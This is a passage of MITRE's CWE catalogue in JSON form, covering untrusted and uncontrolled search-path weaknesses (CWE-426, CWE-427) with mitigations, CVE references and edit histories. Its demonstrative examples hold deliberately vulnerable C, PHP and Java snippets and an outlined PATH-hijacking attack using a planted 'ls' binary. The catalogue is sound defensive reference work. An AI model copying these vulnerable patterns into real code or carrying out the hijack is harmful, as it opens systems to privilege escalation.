Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Relationship_Notes, Taxonomy_Mappings, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"426":{"attr":{"@_ID":"426","@_Name":"Untrusted Search Path","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The application searches for critical resources using an externally-supplied search path that can point to resources that are not under the application\'s direct control.","Extended_Description":{"xhtml:p":["This might allow attackers to execute their own programs, access unauthorized data files, or modify configuration in unexpected ways. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. The problem extends to any type of critical resource that the application trusts.","Some of the most common variants of untrusted search path are:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["In various UNIX and Linux-based systems, the PATH environment variable may be consulted to locate executable programs, and LD_PRELOAD may be used to locate a separate library.","In various Microsoft-based systems, the PATH environment variable is consulted to locate a DLL, if the DLL is not found in other paths that appear earlier in the search order."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"673","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"427","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"428","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Untrusted Path"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The program could be redirected to the wrong files, potentially triggering a crash or hang when the targeted file is too large or does not have the expected format."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The program could send the output of unauthorized files to the attacker."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and look for library functions and system calls that suggest when a search path is being used. One pattern is when the program performs multiple accesses of the same file but in different directories, with repeated failures until the proper filename is found. Library calls such as getenv() or their equivalent can be checked to see if any path-related variables are being accessed."]}},{"Method":"Automated Static Analysis","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Method":"Manual Analysis","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428."},{"Phase":"Implementation","Description":"When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths."},{"Phase":"Implementation","Description":"Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths."},{"Phase":"Implementation","Description":"Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory."},{"Phase":"Implementation","Description":"Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of it, while execl() and execv() require a full path."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-67"},"Intro_Text":"This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define DIR \\"/restricted/directory\\"char cmd[500];sprintf(cmd, \\"ls -l %480s\\", DIR);RaisePrivileges(...);system(cmd);DropPrivileges(...);...","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Raise privileges to those needed for accessing DIR. */"}},{"attr":{"@_Nature":"attack"},"xhtml:ul":{"xhtml:li":["The user sets the PATH to reference a directory under the attacker\'s control, such as \\"/my/dir/\\".","The attacker creates a malicious program called \\"ls\\", and puts that program in /my/dir","The user executes the program.","When system() is executed, the shell consults the PATH to find the ls program","The program finds the attacker\'s malicious program, \\"/my/dir/ls\\". It doesn\'t find \\"/bin/ls\\" because PATH does not contain \\"/bin/\\".","The program executes the attacker\'s malicious program with the raised privileges."]}}],"Body_Text":["This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can\'t control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges.","However, because the program does not modify the PATH environment variable, the following attack would work:"]},{"attr":{"@_Demonstrative_Example_ID":"DX-68"},"Intro_Text":"This code prints all of the running processes belonging to the current user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = getCurrentUser();$command = \'ps aux | grep \' . $userName;system($command);","xhtml:br":["","","",""],"xhtml:i":"//assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78)"}},"Body_Text":"If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users."},{"attr":{"@_Demonstrative_Example_ID":"DX-29"},"Intro_Text":"The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.Runtime.getRuntime().exec(\\"make\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker\'s make will now be run with these privileges, possibly giving the attacker complete control of the system."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1120","Description":"Application relies on its PATH environment variable to find and execute program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1120"},{"Reference":"CVE-2008-1810","Description":"Database application relies on its PATH environment variable to find and execute program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1810"},{"Reference":"CVE-2007-2027","Description":"Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2027"},{"Reference":"CVE-2008-3485","Description":"Untrusted search path using malicious .EXE in Windows environment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3485"},{"Reference":"CVE-2008-2613","Description":"setuid program allows compromise using path that finds and loads a malicious library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2613"},{"Reference":"CVE-2008-1319","Description":"Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1319"}]},"Functional_Areas":{"Functional_Area":["Program Invocation","Code Libraries"]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Untrusted Search Path"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Relative path library search"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"38"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, Process Attributes, page 603"}},{"attr":{"@_External_Reference_ID":"REF-176","@_Section":"Chapter 8, &#34;Canonical Representation Issues.&#34; Page 229"}},{"attr":{"@_External_Reference_ID":"REF-207","@_Section":"Chapter 12, &#34;Trust Management and Input Validation.&#34; Pages&#xA;                  317-320."}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, &#34;Don\'t Trust the PATH - Use Full Path Names&#34; Page 385"}}]},"Notes":{"Note":{"#text":"Search path issues on Windows are under-studied and possibly under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"427":{"attr":{"@_ID":"427","@_Name":"Uncontrolled Search Path Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.","Extended_Description":{"xhtml:p":["Although this weakness can occur with any type of resource, it is frequently introduced when a product uses a directory search path to find executables or code libraries, but the path contains a directory that can be modified by an attacker, such as \\"/tmp\\" or the current working directory.","In Windows-based systems, when the LoadLibrary or LoadLibraryEx function is called with a DLL name that does not contain a fully qualified path, the function follows a search order that includes two path elements that might be uncontrolled:","In some cases, the attack can be conducted remotely, such as when SMB or WebDAV network shares are used.","In some Unix-based systems, a PATH might be created that contains an empty element, e.g. by splicing an empty variable into the PATH. This empty element can be interpreted as equivalent to the current working directory, which might be an untrusted search element.","In software package management frameworks (e.g., npm, RubyGems, or PyPi), the framework may identify dependencies on third-party libraries or other packages, then consult a repository that contains the desired package. The framework may search a public repository before a private repository. This could be exploited by attackers by placing a malicious package in the public repository that has the same name as a package from the private repository. The search path might not be directly under control of the developer relying on the framework, but this search order effectively contains an untrusted element."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the directory from which the program has been loaded","the current working directory."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"DLL preloading","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Binary planting","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Insecure library loading","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Dependency confusion","Description":"As of February 2021, this term is used to describe CWE-427 in the context of managing installation of software package dependencies, in which attackers release packages on public sites where the names are the same as package names used by private repositories, and the search for the dependent package tries the public site first, downloading untrusted code. It may also be referred to as a \\"substitution attack.\\""}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428."},{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths."},{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths."},{"Phase":"Implementation","Description":"Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory. Since this is a denylist approach, it might not be a complete solution."},{"Phase":"Implementation","Description":"Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of finding the program using the PATH environment variable, while execl() and execv() require a full path."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-29"},"Intro_Text":"The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.Runtime.getRuntime().exec(\\"make\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker\'s make will now be run with these privileges, possibly giving the attacker complete control of the system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-3402","Description":"\\"DLL hijacking\\" issue in document editor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3402"},{"Reference":"CVE-2010-3397","Description":"\\"DLL hijacking\\" issue in encryption software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3397"},{"Reference":"CVE-2010-3138","Description":"\\"DLL hijacking\\" issue in library used by multiple media players.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3138"},{"Reference":"CVE-2010-3152","Description":"\\"DLL hijacking\\" issue in illustration program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3152"},{"Reference":"CVE-2010-3147","Description":"\\"DLL hijacking\\" issue in address book.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3147"},{"Reference":"CVE-2010-3135","Description":"\\"DLL hijacking\\" issue in network monitoring software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3135"},{"Reference":"CVE-2010-3131","Description":"\\"DLL hijacking\\" issue in web browser.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3131"},{"Reference":"CVE-2010-1795","Description":"\\"DLL hijacking\\" issue in music player/organizer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1795"},{"Reference":"CVE-2002-1576","Description":"Product uses the current working directory to find and execute a program, which allows local users to gain privileges by creating a symlink that points to a malicious version of the program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1576"},{"Reference":"CVE-1999-1461","Description":"Product trusts the PATH environmental variable to find and execute a program, which allows local users to obtain root access by modifying the PATH to point to a malicous version of that program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1461"},{"Reference":"CVE-1999-1318","Description":"Software uses a search path that includes the current working directory (.), which allows local users to gain privileges via malicious programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1318"},{"Reference":"CVE-2003-0579","Description":"Admin software trusts the user-supplied -uv.install command line option to find and execute the uv.install program, which allows local users to gain privileges by providing a pathname that is under control of the user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0579"},{"Reference":"CVE-2000-0854","Description":"When a document is opened, the directory of that document is first used to locate DLLs , which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0854"},{"Reference":"CVE-2001-0943","Description":"Database trusts the PATH environment variable to find and execute programs, which allows local users to modify the PATH to point to malicious programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0943"},{"Reference":"CVE-2001-0942","Description":"Database uses an environment variable to find and execute a program, which allows local users to execute arbitrary programs by changing the environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0942"},{"Reference":"CVE-2001-0507","Description":"Server uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a malicious file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0507"},{"Reference":"CVE-2002-2017","Description":"Product allows local users to execute arbitrary code by setting an environment variable to reference a malicious program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2017"},{"Reference":"CVE-1999-0690","Description":"Product includes the current directory in root\'s PATH variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0690"},{"Reference":"CVE-2001-0912","Description":"Error during packaging causes product to include a hard-coded, non-standard directory in search path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0912"},{"Reference":"CVE-2001-0289","Description":"Product searches current working directory for configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0289"},{"Reference":"CVE-2005-1705","Description":"Product searches current working directory for configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1705"},{"Reference":"CVE-2005-1307","Description":"Product executable other program from current working directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1307"},{"Reference":"CVE-2002-2040","Description":"Untrusted path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2040"},{"Reference":"CVE-2005-2072","Description":"Modification of trusted environment variable leads to untrusted path vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2072"},{"Reference":"CVE-2005-1632","Description":"Product searches /tmp for modules before other paths.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1632"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Uncontrolled Search Path Element"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"38"}},{"attr":{"@_CAPEC_ID":"471"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-409"}},{"attr":{"@_External_Reference_ID":"REF-410"}},{"attr":{"@_External_Reference_ID":"REF-411"}},{"attr":{"@_External_Reference_ID":"REF-412"}},{"attr":{"@_External_Reference_ID":"REF-413"}},{"attr":{"@_External_Reference_ID":"REF-414"}},{"attr":{"@_External_Reference_ID":"REF-415"}},{"attr":{"@_External_Reference_ID":"REF-416"}},{"attr":{"@_External_Reference_ID":"REF-417"}},{"attr":{"@_External_Reference_ID":"REF-1168"}},{"attr":{"@_External_Reference_ID":"REF-1169"}},{"attr":{"@_External_Reference_ID":"REF-1170"}}]},"Notes":{"Note":[{"#text":"Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere (i.e., modification of a search path), this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control (i.e., the search path cannot be modified by an attacker, but one element of the path can be under attacker control).","attr":{"@_Type":"Relationship"}},{"#text":"This weakness is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model might need enhancement or clarification.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Maintenance_Notes, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Observed_Examples, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, References, Theoretical_Notes"}]}},"428":{"attr":{"@_ID":"428","@_Name":"Unquoted Search Path or Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.","Extended_Description":"If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as \\"C:\\\\Program.exe\\" to be run by a privileged program making use of 